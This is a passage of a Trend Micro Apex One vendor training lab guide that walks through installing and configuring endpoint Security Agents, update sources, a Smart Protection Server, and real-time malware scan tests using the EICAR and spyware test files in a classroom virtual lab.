Apex One integrates capabilities like Application Control, Vulnerability Protection and Endpoint Sensor into a
single Agent installed on the endpoint computer.

Offline Predictive Machine Learning


Apex One includes a new offline machine learning model for use in cases where the endpoint does not
have network connectivity to query the cloud-based learning model hosted on the Trend Micro Smart
Protection Network.

Fileless Threat Detection Enhancements


In-memory runtime analysis capabilities have been enhanced in Apex One to improve fileless threat
detection.

Integrated Vulnerability Protection


Apex One’s Vulnerability Protection provides timely blocking of operating system vulnerabilities. This
Virtual Patching protection is simplified by configuring Vulnerability Protection in one of two modes:
security or performance.

Integrated Application Control


Allows administrators to define which applications are allowed on the protected endpoint. Applications
can be blocked at the category level, by a particular vendor, by a specific application and even by the version
of an application.

Investigative Capabilities
Apex One integrates new Endpoint Detection and Response capabilities including server-side metadata
sweeping, Indicator of Attack (IOA) behavior hunting, and new query and automation Application
Programming Interfaces (API).


Mac Protection Features


Apex One adds new protection features for Mac endpoints, including Endpoint Detection and Response,
Predictive Machine Learning, and Device Control.

Managed Detection and Response Service Support for SaaS

The Trend Micro Managed Detection and Response (MDR) Service, which was previously only supported
in on-premises deployments, is now also supported in the Software as a Service deployment model.

Indicator of Attack Behavioral Analysis Enhancements


Apex One enhances the Indicator of Attack (IOA) Behavioral Analysis capabilities to detect known
indicators of attack including ransomware, encryption behaviors and script launching.

Application Programming Interface Enhancements


Apex One enhances the Application Programming Interface (API) capabilities by introducing more
reporting and control capabilities.

Cloud Sandbox
Apex One as a Service customers can now take advantage of an additional Cloud Sandbox (Deep
Discovery Analyzer as a Service) for Connected Threat Defense, which is available as an add-on service.

Apex Central
Trend Micro Control Manager has been rebranded to Apex Central. This application contains the same
functionality as Control Manager and includes support for new Apex One features such as integrated
Application Control, Vulnerability Protection and Endpoint Sensor.

Kernel Mode Termination Protection


Change protection blocks user mode termination events, but some applications could
potentially terminate processes through kernel mode. To address this issue, Apex One introduces a new
Watchdog mechanism for kernel mode termination events. This mechanism will attempt to recover
target processes after they have been terminated.


Location Awareness Enhancement


An enhancement for location awareness in Apex One checks the network adapter used to connect to
the reference host and identifies whether the endpoint is internal or external. Previously, when an external
Security Agent connected to the Apex One Server using a VPN connection, it was treated as an internal
agent and the related internal policy settings were applied. VPN clients (Cisco, F5, Fortigate…) create a
virtual network adapter as a network device to communicate with the target network. In Apex One, a new
setting called Exclude agents using VPN or PPP dial-up connections is available so that Security Agents using
a VPN connection will be identified as external Agents.



Trend Micro Apex One™
Training for Certified Professionals
Lab Guide
Copyright © 2019 Trend Micro Incorporated. All rights reserved.

Trend Micro, the Trend Micro t-ball logo, InterScan, VirusWall, ScanMail, ServerProtect,
and TrendLabs are trademarks or registered trademarks of Trend Micro Incorporated.
All other product or company names may be trademarks or registered trademarks of
their owners.

Portions of this manual have been reprinted with permission from other Trend Micro
documents. The names of companies, products, people, characters, and/or data
mentioned herein are fictitious and are in no way intended to represent any real
individual, company, product, or event, unless otherwise noted. Information in this
document is subject to change without notice.

No part of this publication may be reproduced, photocopied, stored in a retrieval system,
or transmitted without the express prior written consent of Trend Micro Incorporated.

Released: July 29, 2019


Trend Micro Apex One
Courseware v2
Trend Micro Apex One Training for Certified Professionals - Lab Guide

Table of Contents
Lab 1: Accessing the Apex One Lab Environment ......................................................................1
Exercise 1: Access the Product Cloud Portal (page 3)

Lab 2: Installing Security Agents (page 11)
Exercise 1: Integrate With Microsoft Active Directory (page 11)
Exercise 2: Install an Agent Remotely (page 12)
Exercise 3: Install an Agent through Unmanaged Endpoints (page 16)
Exercise 4: Install an Agent using AUTOPCC (page 20)
Exercise 5: Install Agents Through a Package (page 21)
Exercise 6: View the Agent List (page 22)

Lab 3: Grouping Security Agents (page 25)
Exercise 1: Create an Automatic Agent Grouping (page 25)

Lab 4: Updating Security Agents (page 31)
Exercise 1: Verify Security Agent Update Sources (page 31)
Exercise 2: Create an Update Agent (page 35)

Lab 5: Installing a Standalone Smart Protection Server (page 39)
Exercise 1: Access the Smart Protection Server Management Console (page 39)
Exercise 2: Add the Standalone Smart Protection Server to Apex One (page 42)

Lab 6: Protecting Endpoint Computers From Malware (page 47)
Exercise 1: Configure Real-Time Scans (page 47)
Exercise 2: Test Virus/Malware Scans (page 50)
Exercise 3: Test Spyware/Grayware Scans (page 53)
Exercise 4: View Quarantined Files (page 55)

Lab 7: Protecting Endpoint Computers Through Behavior Monitoring (page 59)
Exercise 1: Block Newly Encountered Software (page 59)

Lab 8: Protecting Endpoint Computers From Unknown Threats (page 63)
Exercise 1: Enable Predictive Machine Learning (page 63)

Lab 9: Blocking Web Threats (page 67)
Exercise 1: Enable Web Reputation (page 67)
Exercise 2: Add an Application to the Web Reputation Whitelist (page 71)
Exercise 3: Protect Endpoint Computers From Browser Exploits (page 72)

Lab 10: Protecting Endpoint Computers Through Traffic Filtering (page 77)
Exercise 1: Enable the Firewall Service (page 77)
Exercise 2: Create a Firewall Policy (page 78)
Exercise 3: Create a Firewall Profile (page 81)
Exercise 4: Verify the Firewall Deployment (page 82)
Exercise 5: Disable the Firewall Policy (page 86)

© 2019 Trend Micro Inc. Education i


Trend Micro Apex One Training for Certified Professionals - Lab Guide

Lab 11: Preventing Data Loss (page 89)
Exercise 1: Install the Data Protection Plug-In (page 89)
Exercise 2: Configure Data Identifiers (page 92)
Exercise 3: Configure a Data Leak Prevention Template (page 94)
Exercise 4: Deploy a New Data Leak Prevention Policy (page 96)
Exercise 5: Modify Justification Reasons (page 102)

Lab 12: Managing Policies Through Apex Central (page 105)
Exercise 1: Integrate Apex Central and Apex One (page 105)
Exercise 2: Create an Apex Central User Account (page 106)
Exercise 3: Confirm Registration (page 109)
Exercise 4: Add Apex One to the Product Directory (page 109)
Exercise 5: Configure a Policy Template (page 111)
Exercise 6: Test the New Policy (page 115)

Lab 13: Submitting Suspicious Files for Analysis (page 117)
Exercise 1: Register Deep Discovery Analyzer With Apex Central (page 117)
Exercise 2: Add Deep Discovery Analyzer to the Product Directory (page 118)
Exercise 3: Subscribe Apex One to the Suspicious Object List (page 119)
Exercise 4: Submit Suspicious Files (page 120)
Exercise 5: Track the Submission (page 121)

Lab 14: Blocking Unauthorized Applications (page 131)
Exercise 1: Create a Policy (page 131)
Exercise 2: Test the Policy (page 134)
Exercise 3: Define Application Control Criteria (page 135)
Exercise 4: Test the Allow Rule (page 138)
Exercise 5: View the Application Control Log Entry (page 138)

Lab 15: Protecting Endpoint Computers from Vulnerabilities (page 141)
Exercise 1: Enable Vulnerability Protection (page 141)
Exercise 2: Test Vulnerability Protection (page 143)
Exercise 3: View the Vulnerability Protection Log Entry (page 145)

Lab 16: Endpoint Detection and Response (page 147)
Exercise 1: Deploy the Endpoint Sensor License (page 147)
Exercise 2: Deploy a Policy using Endpoint Sensor (page 149)
Exercise 3: Verify the New Policy (page 151)
Exercise 4: Investigate a Security Incident (page 151)
Exercise 5: Responding to the Incident (page 155)
Exercise 6: Restore Endpoint Connectivity (page 157)

Lab 1: Accessing the Apex One Lab Environment
This first lab introduces participants to the virtual lab environment used to complete the hands-on
exercises in this Apex One training course.

The classroom lab environment is delivered as a virtual application through the Trend Micro Product
Cloud and will be accessed from a Web browser on your computer. Google Chrome is the preferred
browser for this environment, though other browsers may work if the appropriate plug-ins are enabled
and working properly.

Network Settings
The details and login credentials for each virtual machine in the classroom environment are listed here.

Always log into Windows as the local administrator. Logging in as a domain administrator will display a
different desktop and certain exercise files may not be available.

VM Name / Hostname / Operating System / Addressing / Login

VM-DC2016 (dc2016.trend.local), Windows Server 2016 (hosting Apex One Server)
  IP: 192.168.4.1, Subnet mask: 255.255.240.0, Default gateway: 192.168.0.1
  DNS 1: ::1, DNS 2: 127.0.0.1
  Login Name: administrator, Password: trendmicro

VM-CLIENT-01 (client-01.trend.local), Windows Server 2016
  IP: 192.168.4.2, Subnet mask: 255.255.240.0, Default gateway: 192.168.0.1
  DNS 1: 192.168.4.1, DNS 2: 8.8.8.8
  Login Name: administrator, Password: trendmicro

VM-CLIENT-02 (client-02.trend.local), Windows 10
  IP: 192.168.4.4, Subnet mask: 255.255.240.0, Default gateway: 192.168.0.1
  DNS 1: 192.168.4.1, DNS 2: 8.8.8.8
  Login Name: administrator, Password: trendmicro

VM-CLIENT-03 (client-03.trend.local), Windows 10
  IP: 192.168.4.6, Subnet mask: 255.255.240.0, Default gateway: 192.168.0.1
  DNS 1: 192.168.4.1, DNS 2: 8.8.8.8
  Login Name: administrator, Password: trendmicro

VM-WIN2012 (win2012.trend.local), Windows Server 2012 R2 (hosting Apex Central)
  IP: 192.168.4.3, Subnet mask: 255.255.240.0, Default gateway: 192.168.0.1
  DNS 1: 192.168.4.1, DNS 2: 8.8.8.8
  Login Name: administrator, Password: trendmicro

VM-ANALYZER (DDAN), CentOS
  IP: 192.168.4.5, Subnet mask: 255.255.240.0, Default gateway: 192.168.0.1
  DNS 1: 192.168.4.1, DNS 2: 8.8.8.8
  Login Name: admin, Password: Admin1234!

VM-SPS (SPS), CentOS
  IP: 192.168.4.7, Subnet mask: 255.255.240.0, Default gateway: 192.168.0.1
  DNS 1: 192.168.4.1, DNS 2: 8.8.8.8
  Login Name: admin, Password: trendmicro


Application Credentials
The URLs, user names and passwords used for each application pre-installed within the classroom lab
environment are listed here for easy reference.

Apex One
URL: https://dc2016.trend.local:4343/officescan
• User name: root
• Password: trendmicro

Apex Central
URL: https://192.168.4.3/WebApp/Login.html
• User name: Admin
• Password: Pa$$w0rd

Deep Discovery Analyzer


URL: https://192.168.4.5
• User name: admin
• Password: Admin1234!

Smart Protection Server


URL: https://192.168.4.7:4343
• User name: admin
• Password: trendmicro

Training Cloud Login Credentials


The instructor will distribute a unique Training Cloud user name and password to each class participant.
These credentials will be used for the duration of the training session. Write the user name and password
here for easy retrieval when needed during the different labs.
• User name: __________________________________________________
• Password: ___________________________________________________


Exercise 1: Access the Product Cloud Portal


In this exercise, participants will download a remote access shortcut in the form of an *.rdp file.
Double-clicking the *.rdp file will connect you to the virtual application. This shortcut will be used
repeatedly in the exercises to connect to the classroom environment.
1 Open a Web browser and type the following URL to access the Trend Micro Product Cloud:
https://home.productcloud.trendmicro.com/

2 Log in with the Username and Password assigned to you by the instructor.


3 On the Product Cloud Homepage, click Training Area (from either the left-hand pane or the
middle pane).

4 Click the RDP link for your region (Americas, Asia Pacific, or Europe Middle East and Africa) from
the EDUCATION section of the page.


Note: If you use Product Cloud for other purposes, you may already have an RDP shortcut on your
system. DO NOT use the existing shortcut. Download the version for Education and use the
credentials provided by the Instructor.

5 When prompted, save the *.rdp file to your desktop.


6 Double-click the RemoteApp shortcut (the file you just saved with the *.rdp extension).
7 A RemoteApp pop-up window will appear. If a trust dialog box appears, click Connect in the
window prompting you to trust the publisher of the RemoteApp program.

If prompted, log in again with the User name and Password assigned to you by the Instructor.

Note: Mac users experiencing problems accessing these sites should make sure to use the Microsoft
Remote Desktop client that is available from the Mac App Store at:
https://macappsto.re/ie/HjCQQ.m

8 If a Localization Error is displayed, click Refresh on the vApp menu bar.


9 The Apex One Education virtual application is displayed. Click Open to launch the virtual
application.

10 The different virtual machines that make up the Apex One Education virtual application are
displayed. These correspond to the machines listed in the table at the beginning of this lab.
If the green Start icon is active (not greyed-out), click it to play the virtual application. (The
instructor may have started the vApp for you as part of the classroom setup; in this case, the
Start icon will not be active.)
Once the virtual application is started, you are ready to begin the lab exercises. If the virtual
application fails to start up, please advise your instructor.

Note: It may take a few minutes to start the virtual application the first time it is played.


Alternate Method (use only with Instructor guidance)


If participants are experiencing issues with the RDP connection, the instructor may instruct you to
use this method to connect to the lab environment.
1 Open a Web browser and type the following URL to access the Trend Micro Product Cloud:
https://<region>.productcloud.trendmicro.com/cloud/org/education
(where <region> is the code for the location where the training is being completed). Use
one of the following regions:
• SJDC if you are completing the training in the Americas
• ADC if you are completing the training in Asia
• EDC2 if you are completing the training in Europe, Middle East or Africa
For example:
https://SJDC.productcloud.trendmicro.com/cloud/org/education

Note: Save a bookmark to this URL (or add to Favorites) as you will be returning to it each day of the
course.

2 Log in with the User name and Password assigned to you by the instructor.


3 If a Localization Error is displayed, click Refresh on the vApp menu bar.

4 The Apex One Education virtual application is displayed. Click Open to launch the virtual
application.

5 The different virtual machines that make up the Apex One Education virtual application are
displayed. These correspond to the machines listed in the table at the beginning of this lab.
If the green Start icon is active (not greyed-out), click it to play the virtual application. (The
instructor may have started the vApp for you as part of the classroom setup; in this case, the
Start icon will not be active.)


Note: It may take a few minutes to start the virtual application the first time it is played.

Lab 2: Installing Security Agents
In this lab, participants will install Security Agents on endpoint computers in the virtual lab environment
using a variety of methods.

Estimated time to complete this lab: 30 minutes

Exercise 1: Integrate With Microsoft Active Directory


In this exercise, Apex One will be integrated and synchronized with Microsoft Active Directory to assist
in locating endpoint computers.
1 In the virtual application, click to open the VM-DC2016 virtual machine.
2 Log into Windows Server 2016 with the following credentials if prompted:
• User name: Administrator
• Password: trendmicro

Note: Use <ctrl>+<alt>+<insert> to access the Log In dialog box in the virtual machine, or click the
keyboard icon at the top of the VMware window.

3 Click the maximize icon on the virtual machine window toolbar to maximize the window.

Note: Verify that the keyboard language is set correctly for your locale. If required, click the Change
Language shortcut on the Windows Server 2016 desktop to change the keyboard to another
language.
Alternately, a text file on the desktop called Copy and Paste.txt contains entries that can be
copied into any requested fields.

4 In the Internet Explorer or Chrome Web browser, launch the Apex One Web Management console
by typing the following URL:
https://dc2016.trend.local:4343/officescan
Alternately, click the Apex One bookmark in the browser, or click Apex One in the Windows Start
menu.
5 Log in with the following Apex One credentials when prompted:
• User name: root
• Password: trendmicro
6 Go to Administration > Active Directory > Active Directory Integration.


7 Type the name of the classroom domain (trend) and click Save and Synchronize.

8 A message in the Web Management console confirms that the Active Directory domains are
saved and synchronized.

Exercise 2: Install an Agent Remotely


In this exercise, a Security Agent will be installed on the CLIENT-02 computer using Remote Installation
from the Web Management console.
1 In the virtual application, click to open the VM-CLIENT-02 virtual machine.
If prompted, log in to Windows 10 using the following credentials:
• Username: Administrator
• Password: trendmicro


Note: If an Enable Network Discovery message is displayed when logging into ANY client virtual
machine, click Yes.

2 Click Start > Windows Administrative Tools > Services. Locate the Remote Registry service.


3 Double-click the service and set the Startup type to Automatic and click Apply. Click Start to set
the service to Running. Click OK.

4 Return to the VM-DC2016 virtual machine and in the Web Management console go to Agents >
Agent Installation > Remote.
5 In the Remote Installation window, type client-02 in the Search for endpoints field and hit
<enter>.


6 When prompted, type the administrator credentials to log into the CLIENT-02 computer and click
Log on:
• Username: Administrator
• Password: trendmicro

7 The CLIENT-02 computer is displayed in the Selected Endpoints list. Click Install.

8 Click OK to continue with the Agent installation on the selected endpoints.


9 After a few moments, a confirmation of the remote installation on Agent endpoints is displayed.
Click OK.

10 The Result column will display success once the installation is complete. This may take a few
minutes.

11 Return to the VM-CLIENT-02 virtual machine. A message should be displayed indicating that the
Security Agent was installed on this computer. Wait for the prompt to appear and click Restart
to complete the installation process.

Exercise 3: Install an Agent through Unmanaged Endpoints


In the following exercise, participants will install a Security Agent on an unmanaged endpoint detected
through an Active Directory search.
1 In the virtual application, click to open the VM-CLIENT-03 virtual machine.
If prompted, log in to Windows 10 using the following credentials:
• Username: Administrator
• Password: trendmicro
2 Repeat steps 2-3 from the previous exercise on the CLIENT-03 computer.
3 Return to the VM-DC2016 virtual machine and log into the Apex One Web Management console.


4 Click Assessment > Unmanaged Endpoints. In the Active Directory / IP Address Scope pane, click
the Active Directory tab and click Define Scope.

5 In the Active Directory Scope pane, click to enable trend.local, and click Save and Reassess.

6 Click OK to continue with the query of the domain.


7 The progress of the domain query is displayed.

8 You may need to wait a few moments until the query completes. A success message is displayed
when complete. Click OK.


9 A list of unmanaged endpoints in the trend.local domain is displayed. Click to highlight CLIENT-
03 in the list and click Install.

10 When prompted, type the administrator credentials for the CLIENT-03 computer and click Log
on:
• Username: Administrator
• Password: trendmicro
11 It may take a few minutes for the installation process to complete. Once it is finished, the Status
column will display Complete.

12 Return to the VM-CLIENT-03 virtual machine and wait for a message to be displayed indicating that
the Security Agent was installed on this computer. Restart the computer to complete the
installation process.


Exercise 4: Install an Agent using AUTOPCC


In this exercise, a Security Agent will be installed on the CLIENT-01 computer using the AUTOPCC script.
1 Return to the VM-DC2016 virtual machine. In Windows Explorer, locate and open the following file:
C:\Program Files (x86)\Trend Micro\Apex One\PCCSRV\Autopcc.cfg\autopcc.ini
2 Locate the [Install] section. Modify the following settings:
• SilentInstall: 1 (This will enable silent installation, no setup dialog boxes are displayed on
the client computer)
• NoPrescan: 1 (This will disable the prescan on the client computer)

Save and close the file.


3 In the virtual application, click to open the VM-CLIENT-01 virtual machine.
If prompted, log in to Windows Server 2016 using the following credentials:
• Username: Administrator
• Password: trendmicro
4 Click Run on the taskbar and enter the following command:
\\192.168.4.1\ofcscan\autopcc.exe
5 When prompted, click Run to execute the script.

6 A Windows Command Prompt window will appear momentarily as the script is initiated. After a
short while, the Apex One icon will be displayed in the system tray to indicate it is installed. When
prompted, restart the computer to complete the installation process.


Exercise 5: Install Agents Through a Package


In this exercise, an Agent installation package will be created and run on the DC2016 computer.
1 Return to the VM-DC2016 virtual machine and in Windows Explorer, locate the following folder:
…\PCCSRV\Admin\Utility\ClientPackager\

Note: Some of the lesser-used utilities in this folder have been deleted to conserve space in the
classroom lab environment.

2 Locate and double-click the Agent Packager tool called clnpack.exe.
3 Configure the Agent Packager with the following details:
• Package Type: Setup
• Windows operating system type: 64-bit
• Scan Method: Smart Scan
• Domain: Allow the agent to report its domain automatically
• Disable prescan: Click to enable (no prescan of the target computer should be performed)

Note: In the exercise, the prescan is disabled as it may take several minutes to scan the computer
before the Security Agent is installed. In a real-world configuration, a prescan is recommended.

• Source file: C:\Program Files (x86)\Trend Micro\Apex One\PCCSRV\ofcscan.ini
• Output file: C:\Apex One Installer.exe
Click Create.


4 The Agent Packager will build the installation package with the defined parameters.

5 A Success message is displayed when the packing process is complete. Click OK.

6 Close the Agent Packager utility.


7 In the root of C:\, double-click Apex One Installer.exe to install the Security Agent on the
Windows Server 2016 computer.
After a few moments, the Setup Wizard is displayed and the setup process completes
automatically.
8 After a few minutes, the Apex One icon will be displayed in the system tray to indicate it is
installed. Restart the computer to complete the installation process if prompted.
9 In the VM-WIN2016 virtual image, copy the Apex One Installer.exe file to the Lab Files
folder on the Windows desktop.
10 Open the VM-WIN2012 virtual machine and open the Lab Files folder on the Windows Server 2012
desktop. Double-click the Apex One Installer.exe file to launch the Security Agent setup
application.
After a few moments, the Setup Wizard is displayed and the setup process completes
automatically.
11 After a few minutes, the Apex One icon will be displayed in the system tray to indicate it is
installed. Restart the computer to complete the installation process when prompted.

Exercise 6: View the Agent List


In this exercise, the list of Agents deployed in the previous exercises will be reviewed.
1 Return to the Agent Management list in the Apex One Web Management console.


2 Double-click the Trend domain and the Agents installed in these exercises are displayed. Ensure
that your list matches what is displayed here.

The following methods were used to install the Security Agents in our configuration:
• DC2016: The Security Agent on this computer was installed using a setup application created
using the client packager utility.
• WIN2012: The Security Agent on this computer was installed using a setup application
created using the client packager utility.
• CLIENT-02: The Security Agent on this computer was installed using Remote Installation
from the Web Management console.
• CLIENT-03: The Security Agent on this computer was installed from the Unmanaged
Endpoint list in the Web Management console.
• CLIENT-01: The Security Agent on this computer was installed using the autopcc script.

Lab 3: Grouping Security Agents
In this lab, participants will use automatic grouping techniques to organize Security Agents.

Estimated time to complete this lab: 15 minutes

Exercise 1: Create an Automatic Agent Grouping


In this exercise, a new Agent group (domain) will be created for computers hosting Security Agents. This
new domain will be created based on Agent IP addresses.
1 Open the VM-DC2016 image and in the Apex One Web Management console, click Agents > Agent
Grouping.
2 Click Create custom agent groups for existing Security Agents.


3 In the Automatic Agent Grouping pane, click Add > IP Address.

4 Click Enable grouping and configure the group with the following details:

• Name: Classroom
• IPv4 range: From 192.168.4.1
To 192.168.4.10


5 In the Agent tree pane, hover the pointer over the Trend domain and click the + icon. Type a
name for the new domain (group), for example, Classroom and click the √ icon. Click Save.


6 The grouping details are displayed. Click Save and Create Domain Now.

7 Click OK to acknowledge the message.

8 Return to Agent > Agent Management and expand the Trend domain. Note that the Classroom
group is displayed, but no Agents are collected in the new group.


9 Click the Apex One Server at the top of the Agent tree. Click Manage Agent Tree > Sort Agent.

10 Click Start to begin the sorting operation.

11 Click Close when the sorting operation is complete.


12 Click the Classroom domain in the Agent tree and the Agents within the selected IP address
range are displayed.

Lab 4: Updating Security Agents
In this lab, participants verify alternate update sources for Security Agents, and an Update Agent will be
created to distribute updates within the environment.

Estimated time to complete this lab: 15 minutes

Exercise 1: Verify Security Agent Update Sources


In this exercise, the update source for Security Agents will be compared when the Apex One Server is
online and offline.
1 In the VM-DC2016 image, open the Apex One Web Management console. In the Agent Management
list, click the Classroom domain to display its Agents.
2 Right-click CLIENT-01, and click Settings > Privileges and Other Settings.


3 Click the Other Settings tab, and ensure that Security Agents download updates from the Trend
Micro ActiveUpdate Server is enabled. Click Save.

4 A message is displayed notifying you that the configuration changes have been applied. Click Close.

5 Open the VM-CLIENT-01 virtual machine. Right-click the Security Agent icon in the Windows
system tray and click Update Now.


6 Once complete, a Component update is complete message is displayed. Click Close when the
update is complete.

7 Return to the VM-DC2016 virtual machine and click Start > Windows Administrative Tools >
Internet Information Services Manager.
8 Click to select the Apex One Server virtual website (DC2016), then right-click and click Stop. This
will disable the Apex One server and prevent Agents from retrieving updates from the Server.

9 Return to the VM-CLIENT-01 virtual machine, and run Update Now once again from the Security
Agent icon.
10 Once the update is complete, open Windows Explorer on CLIENT-01 and locate the tmudump.txt
log file located in the following folder:
...\Security Agent\AU_Data\AU_Log\


11 Open the file in Windows Notepad. Locate the entries related to the two Update Now actions:
First Update Now action:

Second Update Now action:

12 Return to the VM-DC2016 virtual machine and restart the Web Server.


Exercise 2: Create an Update Agent


In this exercise, the Security Agent on the CLIENT-03 computer will be promoted to become the Update
Agent for the environment.
1 In the Agent Management list, right-click the CLIENT-03 computer and click Settings >
Update Agent Settings.
2 Click to enable all the options to be delivered by the Update Agent and click Save.

3 A message is displayed confirming the configuration settings have been applied. Click Close.


4 The Security Agent on the CLIENT-03 computer will become the update agent for all of the
Security Agents within an IP address range. Click Updates > Agents > Update Source.
5 Click Customized Update Source and click Add.

6 Configure the IP Range and Update Source as follows:

• IPv4: From 192.168.4.1 to 192.168.4.6


• Update Source: Select CLIENT-03 from the Update Agent list
Click Save.


7 The Customized Update Source list is updated. Click Notify All Agents.

8 On the VM-CLIENT-03 virtual image, navigate to the following folder in Windows Explorer to view
the update files that are available for distribution to Security Agents within the assigned range:
...\Security Agent\activeupdate



Lab 5: Installing a Standalone Smart Protection Server
In this lab, participants will configure a new standalone Smart Protection Server in the classroom
environment and integrate it into the Apex One environment.

Estimated time to complete this lab: 15 minutes

Exercise 1: Access the Smart Protection Server Management Console

The Smart Protection Server has already been installed on a virtual machine in the lab environment. In
this exercise, you will access the Smart Protection Server Management console and run the
Configuration Wizard for first-time installation.
1 In the VM-DC2016 virtual machine, open Internet Explorer or Chrome and click the Smart
Protection Server bookmark or type the following URL to launch the Web console for the Smart
Protection Server:
https://192.168.4.7:4343
If a Certificate Error message is displayed, accept the Security Exception or Continue to this Web
Site.
2 The Smart Protection Server Log On window is displayed.

3 Type the administrator credentials entered during the Smart Protection Server installation and
click Log on.
• Username: admin
• Password: trendmicro


4 A Welcome window is displayed. Click Configure First Time installation.

5 Accept the default selections for the File Reputation Service by clicking Next.

6 Accept the default selection for the Web Reputation service by clicking Next.

Note: You can change whether user-defined approved URLs or blocked URLs are processed first by
making a choice in the Filter Priority section.


7 Disable Trend Micro Smart Feedback and click Next.

8 Leave the proxy settings disabled, and click Finish.


9 The Smart Protection Server Web Management console is displayed.

10 Close the Smart Protection Server Web Management console.

Exercise 2: Add the Standalone Smart Protection Server to Apex One

In this exercise, the Smart Protection Server will be identified as a source for Smart Protection
information within the Apex One Web Management console.
1 Return to the Apex One Web Management console, click Administration > Smart Protection >
Smart Protection Sources.
2 Click the Internal Agents tab, and click the standard list link.


3 In the Standard Smart Protection Server List window, click Add.

4 Type the following details for the Smart Protection Server:


• Server: 192.168.4.7
• File Reputation Services: click to enable
• SSL: click to enable
• File Reputation Services Port: 443
Click Test Connection and ensure that the connection is successful.
• Web Reputation Services: click to enable
• Web Reputation Services Port: 5274
Click Test Connection and ensure that the connection is successful.
Click Save.


5 The new Standalone Smart Protection Server is displayed in the Smart Protection Server List.
The Smart Protection Servers will be accessed by Agents based on their order in the list.

Click Save.
6 Click Save and Notify Agents to distribute the details of the Smart Protection Server to the Agents.

7 A banner in the console notifies you that Agents are being notified of the new Smart Protection
Server.

8 Open Windows Explorer and navigate to the following folder:


...\Apex One\PCCSRV


9 Locate and open the sscfg.ini file to confirm that the Apex One Server is aware of the new
Smart Protection Server.

10 Open the VM-CLIENT-01 virtual image and in Windows Explorer navigate to the following folder:
...\Security Agent
11 Locate and open the ssnotify.ini file to confirm that the Security Agent is aware of the new
Smart Protection Server.

12 Close the VM-CLIENT-01 virtual image.



Lab 6: Protecting Endpoint Computers From Malware
In this lab, participants will enable malware scanning and sample malware will be accessed to trigger the
protection.

Estimated time to complete this lab: 15 minutes

Exercise 1: Configure Real-Time Scans


In this exercise, real-time scanning is configured for agents within the Trend domain.
1 In the VM-DC2016 virtual machine, log into the Apex One Web Management console.
2 In the Agent Management list, right-mouse click the Classroom domain. Click Settings > Scan
Settings > Real-time Scan Settings.

By configuring Real-time Scan Settings at the Classroom branch of the Agent tree, all Agents in
this domain will inherit the settings.


3 On the Target tab, ensure that Enable virus/malware scan and Enable spyware/grayware scan are
both enabled. Click to enable File types scanned by Intelliscan.


4 On the Action tab, click Use the same action for all virus/malware types, and set the 1st Action for
All types to Quarantine. Click Save.

5 A message is displayed notifying that configuration changes have been applied, click Close.

6 In the virtual application, open the VM-CLIENT-02 virtual machine and log into Windows 10.


7 Double-click the Apex One icon in the Windows system tray to display the console.

8 Click the Connection Status icon and note that Real-time Scan is enabled.

Exercise 2: Test Virus/Malware Scans


1 On the CLIENT-02 computer, open Internet Explorer. A message regarding add-ons will be
displayed in the browser.


2 Click Choose add-ons. In the list, click to Enable All to enable the Trend Micro add-ons and click
Done.

Note: These add-ons are used for Web Reputation, but since this is the first time the browser is
accessed since the Security Agent was added to the computer, the prompt to enable the add-ons
is displayed now.

3 In the browser, type the following URL to access the EICAR web site:
http://2016.eicar.org/85-0-Download.html
4 Click to download the eicar.com test file.


5 When prompted, do not save or run the file. Wait a moment and a notification about malware
being downloaded is displayed on the Windows 10 desktop.

6 Click Cancel to terminate the eicar.com download.

7 Click the number 1 in the Threats/Violations Found alert window next to Virus/Malware to open
the Logs viewer for this endpoint computer.

Review the details of the logged event and click Close. Close the Threat/Violations Found alert
window as well.

Note: Even though the malware file was not saved to the computer by clicking Save, the browser still
cached the malware download and triggered the real-time scan.

8 Return to the VM-DC2016 virtual machine and in the Apex One Web Management console, locate
the CLIENT-02 computer in the Agent list.


9 Right-mouse click the computer and click Logs > Virus/Malware Logs. Accept the default criteria
and click Display Logs.

10 The details of the event generated by the malware capture will be displayed.

Click Close.

Note: It may take a few minutes for the Security Agent to forward its logs to the Apex One Server. If
the log entry does not display, try again in a couple of minutes.

Exercise 3: Test Spyware/Grayware Scans


1 Return to the CLIENT-02 computer, locate and open the Lab Files folder on the Windows 10
desktop. In this shared folder, double-click the Spyware_Test_Files folder.
2 Drag the Spyware_Files_Password_novirus.zip file from the shared folder to the Windows 10
desktop.


3 Once on the Windows 10 desktop, right-mouse click the file and click Extract All. Accept the
default location and click Extract.

4 When prompted, type the archive password of novirus and click OK.
5 Wait a moment and a notification about spyware/grayware being detected is displayed on the
Windows 10 desktop.

6 Close the Threat/Violations Found window.


7 Return to the VM-DC2016 virtual machine and in the Apex One Web Management console, locate
the CLIENT-02 computer in the Agent list.


8 Right-mouse click the computer and click Logs > Spyware/Grayware Logs. Accept the default
criteria and click Display Logs.

9 The details of the events generated by the spyware capture will be displayed.

Click Close.

Note: It may take a few minutes for the Security Agent to forward its logs to the Apex One Server. If
the log entry does not display, try again in a couple of minutes.

Exercise 4: View Quarantined Files


In this exercise, participants will view the files quarantined by the Security Agent.
1 Back on the VM-CLIENT-02 virtual machine, open Windows Explorer, and navigate to the
quarantine folder at the following location to verify whether there are any quarantined files (these
will be identified with a .qtn extension):
...\Security Agent\Suspect\Backup
2 Still in Windows Explorer, navigate to the following folder on the CLIENT-02 computer:
...\Security Agent


3 Double-click vsencode.exe to open the Restore utility:


A list of the quarantined files in the folder is displayed.

Note the exact naming of the quarantined virus, for example, eicar[1].com and click Close.
4 Return to the Apex One Server Web Management console on the VM-DC2016 virtual machine.
5 In the Agent Management list, click the Classroom domain to view its Agents. Right-click the
CLIENT-02 computer in the Agent tree and click Tasks > Central Quarantine Restore.


6 In the Central Quarantine Restore Criteria window, type the name of the infected file as displayed
in the Restore Encrypted Virus utility (for example, eicar[1].com) and click Search.

7 In the Central Quarantine Restore window, the option to restore the file is available by selecting
the file and clicking Restore. Optionally, click Add restored file to the domain-level exclusion list
to no longer identify this file as malware.

Click Close without restoring the file.



Lab 7: Protecting Endpoint Computers Through Behavior Monitoring
In this lab, participants will access an unknown application to trigger Malicious Behavior
Detection.

Estimated time to complete this lab: 10 minutes

Exercise 1: Block Newly Encountered Software


In this exercise, a software application that has not been encountered previously will be blocked.
1 On the VM-DC2016 virtual machine, open the Apex One Web Management console.
2 In the Agent Management list, click the Classroom domain to display its Agents.
3 Right-mouse click CLIENT-02 and click Settings > Behavior Monitoring Settings. Ensure that
Monitor newly encountered programs... is enabled along with Prompt User. Click Save.


4 A message is displayed confirming the configuration settings have been applied. Click Close.

5 Log back into the VM-CLIENT-02 virtual image and access the sample detection Web site by
clicking the Detections bookmark in the browser or typing the following URL:
